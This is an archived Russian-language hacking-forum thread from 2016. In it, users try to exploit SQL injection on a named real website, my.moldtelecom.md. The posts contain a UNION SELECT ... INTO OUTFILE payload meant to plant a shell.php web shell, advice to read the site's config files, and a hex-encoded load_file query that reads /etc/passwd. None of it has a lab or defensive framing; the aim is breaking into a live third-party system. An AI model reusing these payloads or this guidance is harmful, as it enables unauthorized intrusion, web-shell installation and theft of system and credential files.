ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
12.02.2016, 10:49
|
|
Guest
Сообщений: n/a
Провел на форуме:
3297
Репутация:
0
|
|
Сообщение от kostea
kostea said:
↑
http://my.moldtelecom.md/scripturi/ajax_login.php?username=\&password=UNION+SELECT+1, '',3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,23,24,25,26,27,28,29+INTO+OUTFILE+'/var/www/html/platformaonline/template/new/scripturi/shell.php'+--+
Что я делаю нетак?
Раскрытие
http://my.moldtelecom.md/scripturi/a....php?username=Нет прав на запись в папку, судя по всему.
|
|
|
|
12.02.2016, 13:15
|
|
Guest
Сообщений: n/a
Провел на форуме:
9857
Репутация:
0
|
|
Сообщение от Setrus
Setrus said:
↑
Нет прав на запись в папку, судя по всему. Когда нет прав пишет по другому
|
|
|
|
15.02.2016, 00:04
|
|
Guest
Сообщений: n/a
Провел на форуме:
37430
Репутация:
0
|
|
Сообщение от kostea
kostea said:
↑
Когда нет прав пишет по другому Экранирование
|
|
|
|
15.02.2016, 04:30
|
|
Guest
Сообщений: n/a
Провел на форуме:
9857
Репутация:
0
|
|
Сообщение от ghost8
ghost8 said:
↑
Экранирование Приз в студию
|
|
|
|
15.02.2016, 04:49
|
|
Guest
Сообщений: n/a
Провел на форуме:
56255
Репутация:
2
|
|
Если я правильно понял то это просто ошибка и ни о какой sql inj тут речи не идет?
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
|
|
|
|
15.02.2016, 05:12
|
|
Guest
Сообщений: n/a
Провел на форуме:
9857
Репутация:
0
|
|
Сообщение от RWD
RWD said:
↑
Если я правильно понял то это просто ошибка и ни о какой sql inj тут речи не идет?
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
Вы или помогаете или не мусорьте
|
|
|
|
15.02.2016, 09:45
|
|
Guest
Сообщений: n/a
Провел на форуме:
37430
Репутация:
0
|
|
Сообщение от kostea
kostea said:
↑
Приз в студию приза не будет,т.к. экранирование на запись в файл не обойти.Только на чтение файла
Читай конфиги
|
|
|
|
15.02.2016, 16:00
|
|
Guest
Сообщений: n/a
Провел на форуме:
9857
Репутация:
0
|
|
Сообщение от ghost8
ghost8 said:
↑
приза не будет,т.к. экранирование на запись в файл не обойти.Только на чтение файла
Читай конфиги Пример можно а то читать тоже неполучилось
|
|
|
|
15.02.2016, 19:33
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от kostea
kostea said:
↑
Пример можно а то читать тоже неполучилось hex. прочитайте статью по MySQL injection
|
|
|
15.02.2016, 22:56
|
|
Guest
Сообщений: n/a
Провел на форуме:
37430
Репутация:
0
|
|
Сообщение от kostea
kostea said:
↑
Пример можно а то читать тоже неполучилось
Код:
Code:
select load_file(0x2f6574632f706173737764); // читаем /etc/passwd
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
